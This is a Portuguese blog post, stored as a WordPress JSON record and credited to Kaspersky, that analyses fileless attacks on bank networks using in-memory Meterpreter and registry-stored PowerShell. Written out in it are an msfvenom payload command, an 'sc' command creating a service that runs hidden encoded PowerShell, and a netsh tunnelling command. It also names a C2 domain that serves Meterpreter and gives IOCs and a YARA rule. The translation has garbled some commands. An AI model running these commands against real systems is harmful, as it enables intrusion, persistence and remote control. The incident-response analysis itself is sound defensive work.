{"id":9631,"date":"2018-10-15T19:31:20","date_gmt":"2018-10-15T22:31:20","guid":{"rendered":"https:\/\/www.ethicalhacker.com.br\/site\/?p=9631"},"modified":"2019-10-14T00:26:05","modified_gmt":"2019-10-14T03:26:05","slug":"ataques-sem-arquivos-contra-redes-corporativas","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2018\/10\/exploits\/ataques-sem-arquivos-contra-redes-corporativas\/","title":{"rendered":"Ataques sem arquivos contra redes corporativas"},"content":{"rendered":"

Conte\u00fado<\/strong><\/p>\n

Durante a resposta a incidentes, uma equipe de especialistas em seguran\u00e7a precisa seguir os artefatos que os invasores deixaram na rede. Os artefatos s\u00e3o armazenados em logs, mem\u00f3rias e discos r\u00edgidos. Infelizmente, cada uma dessas m\u00eddias de armazenamento tem um prazo limitado quando os dados necess\u00e1rios est\u00e3o dispon\u00edveis. Uma reinicializa\u00e7\u00e3o de um computador atacado tornar\u00e1 a aquisi\u00e7\u00e3o de mem\u00f3ria in\u00fatil. V\u00e1rios meses ap\u00f3s um ataque, a an\u00e1lise dos registros torna-se uma aposta porque eles s\u00e3o girados com o tempo. Os discos r\u00edgidos armazenam muitos dados necess\u00e1rios e, dependendo de sua atividade, os especialistas forenses podem extrair dados at\u00e9 um ano ap\u00f3s um incidente. \u00c9 por isso que os invasores est\u00e3o usando t\u00e9cnicas anti-forenses (ou simplesmente SDELETE) e malwares baseados em mem\u00f3ria para ocultar sua atividade durante a aquisi\u00e7\u00e3o de dados. Um bom exemplo da implementa\u00e7\u00e3o dessas t\u00e9cnicas \u00e9 o Duqu2. Depois de soltar no disco r\u00edgido e iniciar seu pacote MSI malicioso, ele remove o pacote do disco r\u00edgido com renomea\u00e7\u00e3o de arquivos e deixa parte de si mesmo na mem\u00f3ria com uma carga \u00fatil. \u00c9 por isso que a an\u00e1lise forense de mem\u00f3ria \u00e9 fundamental para a an\u00e1lise de malware e suas fun\u00e7\u00f5es. Outra parte importante de um ataque s\u00e3o os t\u00faneis que ser\u00e3o instalados na rede por invasores. Cibercriminosos (como Carbanak ou GCMAN) podem usar o PLINK para isso. Duqu2 usou um driver especial para isso. Agora voc\u00ea pode entender por que ficamos muito empolgados e impressionados quando, durante uma resposta a um incidente, descobrimos que malware e encapsulamento baseados em mem\u00f3ria foram implementados por invasores usando utilit\u00e1rios padr\u00e3o do Windows como “SC” e “NETSH”.<\/p>\n

Descri\u00e7\u00e3o<\/strong><\/p>\n

Essa amea\u00e7a foi descoberta originalmente pela equipe de seguran\u00e7a de um banco, depois de detectar o c\u00f3digo Meterpreter dentro da mem\u00f3ria f\u00edsica de um controlador de dom\u00ednio (DC). Os nomes de detec\u00e7\u00e3o de produtos da Kaspersky Lab para esse tipo de amea\u00e7a s\u00e3o MEM: Trojan.Win32.Cometer e MEM: Trojan.Win32.Metasploit. A Kaspersky Lab participou da an\u00e1lise forense depois que esse ataque foi detectado, descobrindo o uso de scripts do PowerShell no registro do Windows. Al\u00e9m disso, foi descoberto que o utilit\u00e1rio NETSH \u00e9 usado para encapsular o tr\u00e1fego do host da v\u00edtima at\u00e9 o C2 do invasor.<\/p>\n

Sabemos que o framework Metasploit foi usado para gerar scripts como o seguinte:<\/p>\n

\"s1\"<\/a><\/p>\n

Esse script aloca mem\u00f3ria, resolve WinAPIs e faz o download do utilit\u00e1rio Meterpreter diretamente para a RAM. Esses tipos de scripts podem ser gerados usando o utilit\u00e1rio Metasploit Msfvenom com as seguintes op\u00e7\u00f5es de linha de comando:<\/p>\n

msfvenom -p windows \/ meterpreter \/ bind_hidden_tcp AHOST = 10.10.1.11 -f psh-cmd<\/p>\n

Ap\u00f3s a gera\u00e7\u00e3o bem-sucedida de um script, os invasores usaram o utilit\u00e1rio SC para instalar um servi\u00e7o mal-intencionado (que executar\u00e1 o script anterior) no host de destino. Isso pode ser feito, por exemplo, usando o seguinte comando:<\/p>\n

sc \\ target_name create ATITscUA binpath = \u201cC: Windowssystem32cmd.exe \/ b \/ c iniciar \/ b \/ min powershell.exe -nop -w oculto e aQBmACgAWwBJAG4AdABQAHQA\u2026\u201d start = manual<\/p>\n

A pr\u00f3xima etapa ap\u00f3s a instala\u00e7\u00e3o do servi\u00e7o malicioso seria configurar t\u00faneis para acessar a m\u00e1quina infectada a partir de hosts remotos, por exemplo, usando o seguinte comando:<\/p>\n

netsh interface portproxy adicionar v4tov4 listenport = 4444 connectaddress = 10.10.1.12 connectport = 8080 listenaddress = 0.0.0.0<\/p>\n

Isso resultaria em todo o tr\u00e1fego de rede de 10.10.1.11:4444 sendo encaminhado para 10.10.1.12:8080. Essa t\u00e9cnica de configura\u00e7\u00e3o de t\u00faneis de proxy fornecer\u00e1 aos invasores a capacidade de controlar qualquer host infectado do PowerShell de hosts de Internet remotos.<\/p>\n

O uso dos utilit\u00e1rios “SC” e “NETSH” requer privil\u00e9gios de administrador no host local e remoto. O uso de scripts do PowerShell mal-intencionados tamb\u00e9m requer altera\u00e7\u00f5es de pol\u00edticas de escalonamento e execu\u00e7\u00e3o de privil\u00e9gios. Para conseguir isso, os invasores usavam credenciais de contas de servi\u00e7o com privil\u00e9gios administrativos (por exemplo, backup, servi\u00e7o para agendador de tarefas remotas, etc.) .<\/p>\n

\"m2\"<\/a><\/p>\n

 <\/p>\n

Caracter\u00edsticas<\/strong><\/p>\n

A an\u00e1lise de despejos de mem\u00f3ria e registros do Windows de m\u00e1quinas afetadas nos permitiu restaurar o Meterpreter e o Mimikatz. Essas ferramentas foram usadas para coletar senhas de administradores de sistemas e para a administra\u00e7\u00e3o remota de hosts infectados.<\/p>\n

Para obter a carga \u00fatil do PowerShell usada pelos invasores dos despejos de mem\u00f3ria, usamos os seguintes comandos BASH:<\/p>\n

cat mal_powershell.ps1_4 | cut -f12 -d \u201d\u201d | base64 -di | corte -f8 -d \u2019| base64 -di | zcat – | cut -f2 -d (| corte -f2 -d | | menos | grep \/ | base64 -di | hd<\/p>\n

Resultando na seguinte carga:<\/p>\n

\u00a0\"m10\"<\/a><\/p>\n

Parte de um c\u00f3digo respons\u00e1vel por baixar Meterpreter de \u201cadobeupdates.sytes [.] Net\u201d\r\n\r\n<\/span>\r\nV\u00edtimas\r\n<\/span><\/strong><\/pre>\n
Usando o Kaspersky Security Network, encontramos mais de 100 redes corporativas infectadas por scripts mal-intencionados do PowerShell no Registro. Estes s\u00e3o detectados como Trojan.Multi.GenAutorunReg.c e HEUR: Trojan.Multi.Powecod.a. A tabela abaixo mostra o n\u00famero de infec\u00e7\u00f5es por pa\u00eds.<\/p>\n
\ufffc\ufffc\ufffc\ufffc\ufffc
\n\ufffc\"m4\"<\/a><\/p>\n
No entanto, n\u00e3o podemos confirmar que todos eles foram infectados pelo mesmo atacante.<\/span><\/p>\n
Atribui\u00e7\u00e3o<\/span><\/strong><\/p>\n
Durante nossa an\u00e1lise do banco afetado, soubemos que os invasores haviam usado v\u00e1rios dom\u00ednios e dom\u00ednios de terceiro n\u00edvel nos ccTLDs .GA, .ML e .CF. O truque de usar esses dom\u00ednios \u00e9 que eles s\u00e3o informa\u00e7\u00f5es WHOIS livres e ausentes ap\u00f3s a expira\u00e7\u00e3o do dom\u00ednio. Como os invasores usaram a estrutura Metasploit, utilit\u00e1rios padr\u00e3o do Windows e dom\u00ednios desconhecidos sem informa\u00e7\u00f5es WHOIS, isso torna a atribui\u00e7\u00e3o quase imposs\u00edvel. Os grupos mais pr\u00f3ximos com os mesmos TTPs s\u00e3o GCMAN e Carbanak.<\/p>\n
Ap\u00eandice I – Indicadores de Compromisso<\/strong><\/p>\n
Para localizar o host usado por um invasor usando a t\u00e9cnica descrita para conex\u00f5es remotas e coleta de senha, os seguintes caminhos no registro do Windows devem ser analisados:<\/p>\n
HKLMSYSTEMControlSet001services – o caminho ser\u00e1 modificado depois de usar o utilit\u00e1rio SC
\nHKLMSYSTEMControlSet001servicesPortProxyv4tov4tcp – o caminho ser\u00e1 modificado depois de usar o utilit\u00e1rio NETSH
\nNo espa\u00e7o n\u00e3o alocado no registro do Windows, os seguintes artefatos podem ser encontrados:<\/p>\n
powershell.exe -nop -w oculto -e
\n10.10.1.12\/8080
\n10.10.1.11\/4444<\/p>\n
Por favor, note que esses IPs s\u00e3o retirados do caso de IR em que participamos, portanto, pode haver qualquer outro IP usado por um atacante eventual. Esses artefatos indicam o uso de scripts do PowerShell como um servi\u00e7o mal-intencionado e o uso do utilit\u00e1rio NETSH para construir t\u00faneis.<\/p>\n
Vereditos:<\/strong><\/p>\n
MEM: Trojan.Win32.Cometer
\nMEM: Trojan.Win32.Metasploit
\nTrojan.Multi.GenAutorunReg.c
\nHEUR: Trojan.Multi.Powecod<\/p>\n
 <\/p>\n
Ap\u00eandice II – Regras de Yara<\/span><\/strong><\/p>\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n<\/div>\n<\/td>\n
\n
\n
\u00a0 \u00a0rule<\/span>msf_or_tunnel_in_registry<\/span><\/div>\n
\u00a0 \u00a0{<\/span><\/div>\n
\u00a0 \u00a0strings<\/span>:<\/span><\/div>\n
\u00a0\u00a0 <\/span>$<\/span>port_number_in_registry<\/span>=<\/span>“\/4444”<\/span><\/div>\n
\u00a0\u00a0 <\/span>$<\/span>hidden_powershell_in_registry<\/span>=<\/span>“powershell.exe -nop -w\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0hidden”<\/span>wide\u00a0\u00a0\u00a0\u00a0<\/span><\/div>\n
\u00a0 \u00a0condition<\/span>:<\/span><\/div>\n
\u00a0 \u00a0uint32<\/span>(<\/span>0<\/span>)<\/span>==<\/span>0x66676572<\/span>and<\/span>any <\/span>of <\/span>them<\/span><\/div>\n
\u00a0 }<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
 <\/p>\n
Fonte: KASPERSKY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Conte\u00fado Durante a resposta a incidentes, uma equipe de especialistas em seguran\u00e7a precisa seguir os artefatos que os invasores deixaram na rede. Os artefatos s\u00e3o armazenados em logs, mem\u00f3rias e discos r\u00edgidos. Infelizmente, cada uma dessas m\u00eddias de armazenamento tem um prazo limitado quando os dados necess\u00e1rios est\u00e3o dispon\u00edveis. Uma reinicializa\u00e7\u00e3o de um computador atacado […]<\/p>\n","protected":false},"author":2,"featured_media":9633,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[89,100,21,105,99],"tags":[],"class_list":["post-9631","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-basico","category-diversos","category-exploits","category-noticias","category-novidades"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/9631","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=9631"}],"version-history":[{"count":32,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/9631\/revisions"}],"predecessor-version":[{"id":10242,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/9631\/revisions\/10242"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/9633"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=9631"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=9631"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=9631"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}